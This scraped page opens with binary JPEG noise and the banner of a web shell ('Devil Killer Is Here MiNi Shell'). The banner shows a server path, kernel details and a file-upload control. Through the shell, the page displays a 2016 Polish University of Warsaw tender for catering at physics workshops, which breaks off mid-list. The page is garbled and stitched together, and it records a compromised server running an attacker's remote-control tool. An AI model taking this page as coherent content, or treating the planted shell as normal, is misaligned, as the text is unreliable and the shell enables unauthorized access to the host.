JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160215/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20160215/33332-N-2016.html

<p class="kh_header"><b>Warszawa: Świadczenie usług gastronomicznych podczas wydarzeń organizowanych na Wydziale Fizyki Uniwersytetu Warszawskiego</b><br>
<b>Numer ogłoszenia: 33332 - 2016; data zamieszczenia: 15.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Warszawski , Krakowskie Przedmieście 26/28, 00-927 Warszawa, woj. mazowieckie, tel. 22 55 32 403, faks 22 55 32 213.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.fuw.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług gastronomicznych podczas wydarzeń organizowanych na Wydziale Fizyki Uniwersytetu Warszawskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług gastronomicznych podczas wydarzeń organizowanych na Wydziale Fizyki Uniwersytetu Warszawskiego:

Część 1: Świadczenie usług gastronomicznych wraz z wynajęciem sprzętu gastronomicznego podczas Warsztatów Recent Advances in Quantum Metrology odbywających się w ramach projektu PhoQuS@UW na Wydziale Fizyki UW w marcu 2016 r.
Część 2: Świadczenie usług gastronomicznych wraz z wynajęciem sprzętu gastronomicznego podczas Warsztatów Spectral and Spatial Engineering of Quantum Light odbywających się w ramach projektu PhoQuS@UW na Wydziale Fizyki UW w marcu-kwietniu 2016 r.

Część 3:Świadczenie usług gastronomicznych w trakcie Warsztatów innowacyjności odbywających się w ramach projektu PhoQuS@UW na Wydziale Fizyki UW w 2016 r.

Część 4: Świadczenie usług gastronomicznych wraz z wynajęciem sprzętu gastronomicznego w trakcie drugiego spotkania ewaluacyjnego projektu PhoQuS@UW

Część 5: Świadczenie usług gastronomicznych wraz z wynajęciem sprzętu gastronomicznego w trakcie trzeciego spotkania ewaluacyjnego projektu PhoQuS@UW.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 55.30.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego oświadczenia z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże główne usługi wykonane w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. 

Dotyczy część 1: 
Przez główne usługi, należy rozumieć:  trzy usługi gastronomiczne  świadczone dla co najmniej  3 kontrahentów wartości co najmniej 19 000,00 zł brutto dla każdego kontrahenta. 

Dotyczy część 2: 
Przez główne usługi, należy rozumieć:  trzy usługi gastronomiczne  świadczone dla co najmniej 3 kontrahentów o wartości co najmniej 15 000,00 zł brutto dla każdego kontrahenta. 

Dotyczy część 3: 
Przez główne usługi, należy rozumieć:  trzy usługi gastronomiczne  świadczone dla co najmniej 3 kontrahentów o wartości co najmniej 5 800,00 zł brutto dla każdego kontrahenta. 

Dotyczy część 4: 
Przez główne usługi, należy rozumieć:  trzy usługi gastronomiczne  świadczone dla co najmniej 3 kontrahentów o wartości co najmniej 6 000,00 zł brutto dla każdego kontrahenta. 
Dotyczy część 5: 
Przez główne usługi, należy rozumieć:  trzy usługi gastronomiczne  świadczone dla co najmniej 3 kontrahentów o wartości co najmniej 17 000,00 zł brutto dla każdego kontrahenta.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego oświadczenia z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego oświadczenia z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Ocena spełnienia warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie załączonego oświadczenia z art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie zawodowe - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, w wypadku wystąpienia jednej z następujących okoliczności, tj.:
1)	w wypadku zmian podmiotowych po stronie Wykonawcy, zgodnie z obowiązującymi przepisami prawa,
2)	w wypadku zmian stanu prawnego lub faktycznego, które mają wpływ na treść zawartej umowy, jeżeli tak zamiana leży w interesie publicznym,
3)	w pozostałym zakresie - w sytuacji nieprzewidzianej i niezawinionej przez strony, której wystąpienia strony nie mogły przewidzieć pomimo zachowania należytej staranności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.fuw.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Fizyki UW, ul. Pasteura 5, 02-093 Warszawa, pokój 0.18 (parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.02.2016 godzina 11:00, miejsce: Wydział Fizyki Uniwersytetu Warszawskiego, ul. Pasteura 5, 02-093 Warszawa, pokój 0.18 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Przedmiot zamówienia jest współfinansowany z projektu p.n. PhoQuS@UW Fostering Excellence in Photonics and Quantum Science no 316244 FP7-REGPOT-2012-2013-1.

Lokal Wykonawcy powinien spełniać następujące warunki:
1.	Zamawiający pod pojęciem lokal Wykonawcy rozumie - lokal gastronomiczny w którym konsumpcja odbywa się przy stolikach z obsługą kelnerską (restauracja).
2.	Odległość lokalu Wykonawcy od głównego wejścia do Pałacu na Wyspie usytuowanego w Łazienkach Królewskich przy ul. Agrykoli 1 w Warszawie nie może wynosić w linii prostej więcej niż 900 m (przed kolacją planowane jest zwiedzanie Muzeum Łazienki Królewskie).  
3.	Odległość lokalu Wykonawcy od głównego wejścia do Pałacu na Wyspie usytuowanego w Łazienkach Królewskich, ul. Agrykoli 1 w Warszawie zostanie sprawdzona wg strony www.maps.google.pl.
4.	Podczas kolacji w lokalu Wykonawcy uczestnicy kolacji mają być usadzeni tak by umożliwić im swobodną rozmowę, w odległości zapewniającej bezpieczeństwo i swobodę konsumpcji (min. długość krawędzi stołu 60 cm osobę). 
5.	Restauracja, w której świadczona będzie usługa restauracyjna, musi pomieścić ok. 40 osób usadowionych w jednym, nieprzedzielonym pomieszczeniu, o powierzchni min.100 m2 , nieposiadającym czynnego-otwartego wyjścia z zewnątrz oraz wyjścia do kuchni a także nieposiadającym wewnętrznych przeszkód konstrukcyjnych, przy maksymalnie dwóch rozdzielonych stołach.
6.	Zamawiający żąda, aby w pomieszczeniu wskazanym w pkt. 4 (pomieszczeniu przeznaczonym na kolację) nie było gości zewnętrznych (spoza warsztatów).
7.	Lokal serwujący kolację musi posiadać w menu dania kuchni polskiej.


Wymagania dodatkowe (dotyczą wszystkich części zamówienia):
1.	Wykonawca jest zobowiązany do realizacji zamówienia w miejscu podanym przez Zamawiającego. Miejsce realizacji usługi może ulec zmianie, przy zachowaniu odległości od obecnego do 4,5 km w linii prostej (wg strony www.maps.google.pl) - nie dotyczy Lokalu Wykonawcy.
2.	Nowe miejsce realizacji będzie podane 5 dni przed realizacją usługi przez zamawiającego drogą elektroniczną lub telefoniczną. Zamawiający zastrzega sobie możliwość wskazania różnych miejsc realizacji usługi, w różnych obiektach w tym dla każdego rodzaju świadczonej usługi tj. pierwszej przerwy kawowej, drugiej przerwy kawowej, przerwy obiadowej - nie dotyczy Lokalu Wykonawcy.
3.	Szczegółowy harmonogram zawierający miejsce i godzinę serwowania usługi gastronomicznej zostanie przekazany Wykonawcy 5 dni przed realizacją usługi.
4.	Dostarczone potrawy muszą być świeże, przyrządzone w dniu świadczenia usług gastronomicznych. Produkty powinny spełniać normy jakościowe i mieć ważny okres przydatności do spożycia. Zamawiający nie dopuszcza możliwości wydawania posiłków z półproduktów. Posiłki powinny być przygotowywane z surowców świeżych i o wysokiej jakości z zachowaniem reżimów dietetycznych i sanitarnych.
5.	W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany zapewnić sprzęt gastronomiczny konieczny do zapewnienia usługi gastronomicznej i restauracyjnej (nie dotyczy usługi wynajęcia dodatkowego sprzętu gastronomicznego).
6.	W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany zapewnić obsługę kelnerską oraz porządek i czystość pomieszczeń, w których będzie świadczona usługa. Miejsce, w którym będzie świadczona usługa zostanie uporządkowane i sprzątnięte po wykonaniu usługi każdorazowo.
7.	Obsługa kelnerska będzie w stanie porozumieć się z gośćmi w języku angielskim w podstawowym zakresie niezbędnym dla ustalenia indywidualnych preferencji gości.
8.	W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany zapewnić nakrycia stołowe ceramiczne lub porcelanowe, szkło oraz sztućce metalowe dostosowane do serwowanych potraw. Niedopuszczalna jest zastawa jednorazowa.
9.	W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany zapewnić dostarczenie stolików do konsumpcji na stojąco, o wielkości umożliwiającej spożywanie posiłku przez 4-5 osób, wraz z pokrowcami lub i obrusami w liczbie stosownie do liczby stolików (kolor pokrowców - biały, kolor obrusów - biały. Na każdym stoliku powinny się znajdować serwetki jednorazowe) - nie dotyczy kolacji zasiadanej.
10.	W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany zapewnić dekoracje ze świeżych kwiatów o średnicy min. 30 cm, składający się z co najmniej 15 kwiatów ciętych, w wysokim naczyniu szklanym na każdy stół, na którym serwowane będą potrawy wytrawne i słodkie oraz dekoracje z min. 3 kwiatów w naczyniach szklanych na każdym stoliku do konsumpcji na stojąco.
11.	W ramach realizacji przedmiotu zamówienia Wykonawca jest zobowiązany zapewnić dostarczenie stołów umożliwiających ustawienie zastawy stołowej, naczyń, innego sprzętu gastronomicznego, potraw i napojów w czasie przerw kawowych i obiadowych. Stoły muszą być przykryte obrusami w kolorze białym.
12.	Wykonawca jest zobowiązany do przygotowani do każdej potrawy opisu w języku angielskim zawierającej następujące informacje: krótki opis dania - z czego się składa, czy zawiera mięso, czy jest daniem wegetariańskim oraz uwzględniający składniki będące alergenami (orzechy, laktoza, owoce morza, soja itp.). Opis Wykonawca przekaże do akceptacji Zamawiającego 5 dni przed wykonaniem usługi.
13.	Jako danie mięsne rozumie się danie zawierające produkty mięsne mięso, w szczególności: wędliny, mięso, ryby, wywary i ekstrakty mięsne i rybne, żelatyna, tłuszcze zwierzęce w tym rybne.
14.	Jako danie wegetariańskie rozumie się danie niezawierające produktów mięsnych mięsa, w szczególności: wędlin, mięsa, ryb, wywarów i ekstraktów mięsnych i rybnych, żelatyny, tłuszczów zwierzęcych w tym rybnych.
15.	Wykonawca zobowiązany jest do zapewnienia odpowiedniej ilości koszy na śmieci i do zebrania naczyń oraz resztek pokonsumpcyjnych najpóźniej do 60 min. po zakończeniu każdego z posiłków.
16.	Wybór dania głównego nie może się powtarzać w żadnym z jego poszczególnych elementów w następujących po sobie dniach świadczenia usługi. Dopuszczalne jest podawanie różnych ryb lub mięs, jak również wyboru tych samych dodatków: ziemniaków, makaronu, ryżu czy kaszy. 
17.	Oferta, zamieszczona w tabeli znajdującej się w formularzu ofertowym (lista oferowanego przedmiotu zamówienia), musi zawierać szczegółowy opis oferowanego menu z uwzględnieniem: rodzaju dania, nazwy dania, składu, gramatury, składników, itp. W przypadku dań wegetariańskich oferta musi zawierać pełen skład surowcowy dania. Oferta musi być zgodna z wymaganiami zawartymi w opisie przedmiotu zamówienia. 
UWAGA: Oferty, w których nie zostaną wskazane w w nazwy i składniki oferowanego przedmiotu zamówienia zostaną ODRZUCONE.
18.	Jeśli mowa o dniach, rozumie się przez to dni kalendarzowe.
19.	Zamawiający zastrzega sobie prawo do kontroli sposobu realizacji usługi na każdym jej etapie. W związku z powyższym Wykonawca zapewni opiekę osoby odpowiedzialnej za całość przedsięwzięcia realizowanego w obiekcie Zamawiającego lub przez niego wskazanym. Wykonawca wskaże osobę, która będzie obecna w miejscu wykonywania usługi oraz dostępna pod numerem telefonu oraz e-mailem w trakcie wykonywania usługi oraz na dwie godziny przed i po zakończeniu wykonywania usługi.
20.	Zamawiający zastrzega sobie, iż Wykonawca dostarczy faktury osobno na każdą część zamówienia  i ponadto osobne faktury na wynajem sprzętu gastronomicznego.
21.	Zamawiający zastrzega sobie możliwość zmiany godziny (+ i - 1 godzina) serwowania posiłku, o czym Zamawiający powiadomi Wykonawcę z wyprzedzeniem 1,5 godzin (nie dotyczy przerw serwisu kawowego i przerw kawowych porannych).
Dodatkowo do oferty należy dołączyć:
1) wypełniony i podpisany formularz ofertowy o nr  1.1, 1.2, 1.3, 1.4, 1.5 do SIWZ wraz z załącznikiem do formularza ofertowego pt. listą oferowanego przedmiotu zamówienia (menu), obejmująca wszystkie rodzaje posiłków. Przedmiotowe menu ma zawierać: nazwę oferowanych dań (dania główne, zupy, desery, ciastka, dodatki skrobiowe, surówki) gramaturę oferowanych dań, rodzaje oferowanych napojów, wykaz sprzętu gastronomicznego (ilość i poszczególne nazwy). 
Oferty, w których nie zostaną wskazane w w dane zostaną ODRZUCONE.
3) pełnomocnictwo do podpisania oferty, jeżeli nie wynika ono z załączonych dokumentów, należy załączyć na piśmie w formie oryginału lub w formie notarialnie poświadczonej kopii,
4) jeśli dotyczy - pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, należy załączyć na piśmie w formie oryginału lub w formie notarialnie poświadczonej kopii..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług gastronomicznych wraz z wynajęciem sprzętu gastronomicznego podczas Warsztatów Recent Advances in Quantum Metrology odbywających się w ramach projektu PhoQuS@UW na Wydziale Fizyki UW w marcu 2016 r.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Realizacją części 1 zamówienia obejmuje:

I: Serwowanie wody dla prelegentów w salach wykładowych -  każdy z 3 dni (w terminie od 02.03.2016 do 04.03.2016) 
serwowana w godzinach od 09.00 do 18.00, w salach wykładowych w budynku Wydziału Fizyki UW przy ul. Pasteura 5 lub we wskazanym przez Zamawiającego miejscu wraz z szklankami):
1)	woda mineralna niegazowana, w butelkach szklanych 0,33l - 6 butelek
2)	woda mineralna gazowana, w butelkach szklanych 0,33l - 4 butelki

II. II. Świadczenie usług gastronomicznych:
Usługi planowane są dla ok. 50 osób, będących pracownikami Uniwersytetu Warszawskiego, w dniach 02.03.2016 r. -04.03.2016 r. (3 dni). 
Podana liczba osób może ulec zmniejszeniu lub zwiększeniu o 20%. Ostateczna liczba osób zostanie podana 5 dni przed terminem realizacji usługi drogą elektroniczną lub telefonicznie.
Usługi gastronomiczne dla uczestników warsztatów obejmują:
